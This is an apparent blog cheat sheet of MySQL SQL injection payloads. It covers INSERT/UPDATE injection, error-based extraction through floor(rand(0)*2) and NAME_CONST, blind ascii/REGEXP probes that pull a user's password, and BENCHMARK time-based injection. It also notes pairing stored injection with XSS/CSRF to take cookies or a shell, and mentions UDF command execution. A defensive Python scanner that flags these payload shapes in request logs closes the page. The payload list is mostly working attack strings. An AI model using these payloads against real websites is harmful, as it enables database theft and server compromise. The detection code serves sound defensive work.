  • SQL general injection (II)

    MySQL general injection (II)


    1. MySQL general injection (INSERT, UPDATE)

    Ordinary MySQL requests made through mysql_query do not support multi-statement execution; mysqli does.

    INSERT injection mostly relies on error-based injection.

      1. If an administrator row can be inserted directly, it can be used directly.

         insert into user(username,password) values('xxxx',' xxxx'),('dddd','dddd')/* ');

      2. If some data can be inserted and that data is then displayed on a web page, it can be combined with XSS and CSRF to obtain cookies or get a shell.

    UPDATE injection works the same way.

    2. MySQL error-based injection

      1. and(select 1 from(select count(*),concat((select (select (statement)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

         Replace (statement) with an ordinary query, for example:

         SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1

      2. and+1=(select+*+from+(select+NAME_CONST((statement),1),NAME_CONST((statement),1))+as+x)--

      3. update web_ids set host='www.0x50sec.org' where id =1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (statement)),1,62)))a from information_schema.tables group by a)b);

      4. insert into web_ids(host) values((select (1) from mysql.user where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (statement)),1,62)))a from information_schema.tables group by a)b)));

    3. MySQL general blind injection

      Using ascii:

         AND ascii(substring((SELECT password FROM users where id=1),1,1))=49

      Using a regular expression:

         and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-n]' LIMIT 0,1)

    4. MySQL time-based blind injection

         1170 union select if(substring(current,1,1)=char(11),benchmark(5000000,encode('msg','by 5 seconds')),null) from (select database() as current) as tbl

         UNION SELECT IF(SUBSTRING(Password,1,1)='a',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = 'root'

    5. MySQL version-specific features

      1. MySQL 5.0 and later: the information_schema database appears.
      2. MySQL 5.1 and later: UDFs are imported into the xx\lib\plugin directory.
      3. MySQL 5.x and later: system executes commands.
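
Seen from the defending side, the payload shapes listed above leave recognisable traces in request logs. The following is an added example, not part of the original post: a small Python scanner that flags query parameters matching those shapes. The request targets, signature names and function names are constructed for illustration, and matching of this kind supports log review but does not replace parameterized queries.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Patterns derived from the payload shapes listed on this page (names are hypothetical).
SIGNATURES = {
    "error_rand_group_by": re.compile(r"floor\(rand\(0\)\*2\).*group by", re.S),
    "error_name_const": re.compile(r"name_const\("),
    "blind_ascii_substring": re.compile(r"ascii\(substr(?:ing)?\("),
    "blind_schema_regexp": re.compile(r"information_schema\.\w+.*\bregexp\b", re.S),
    "time_benchmark": re.compile(r"benchmark\(\d+,"),
}

def normalize(value: str) -> str:
    """Lowercase, replace /*...*/ comments with a space, collapse whitespace,
    and drop spaces around ( ) , * = so spacing tricks do not hide a match."""
    value = re.sub(r"/\*.*?\*/", " ", value.lower(), flags=re.S)
    value = re.sub(r"\s+", " ", value)
    return re.sub(r"\s*([(),*=])\s*", r"\1", value)

def scan(request_target: str) -> dict:
    """Return {parameter: [signature names]} for every query parameter that matches."""
    hits = {}
    query = urlsplit(request_target).query
    # parse_qsl URL-decodes values, including '+' as a space.
    for name, value in parse_qsl(query, keep_blank_values=True):
        text = normalize(value)
        matched = [sig for sig, rx in SIGNATURES.items() if rx.search(text)]
        if matched:
            hits[name] = matched
    return hits

# Constructed request targets; the inner statement is replaced by "select 1".
SAMPLES = [
    "/news.php?id=1%20AND%20ascii(substring((SELECT%20password%20FROM%20users%20where%20id=1),1,1))=49",
    "/news.php?id=1+and+1=(select+*+from+(select+NAME_CONST((select+1),1),NAME_CONST((select+1),1))+as+x)--",
    "/news.php?id=1170+union+select+if(substring(current,1,1)=char(11),BENCHMARK(5000000,encode('msg','x')),null)+from+(select+database()+as+current)+as+tbl",
    "/news.php?id=1+and(select+1+from(select+count(*),concat((select+1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)",
    "/search.php?q=benchmark+results+for+sha1",  # benign: the word alone must not match
]

if __name__ == "__main__":
    for target in SAMPLES:
        print(scan(target) or "clean", "<-", target[:60])
```
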

      

  • Original article: https://www.cnblogs.com/52xuege/p/9270764.html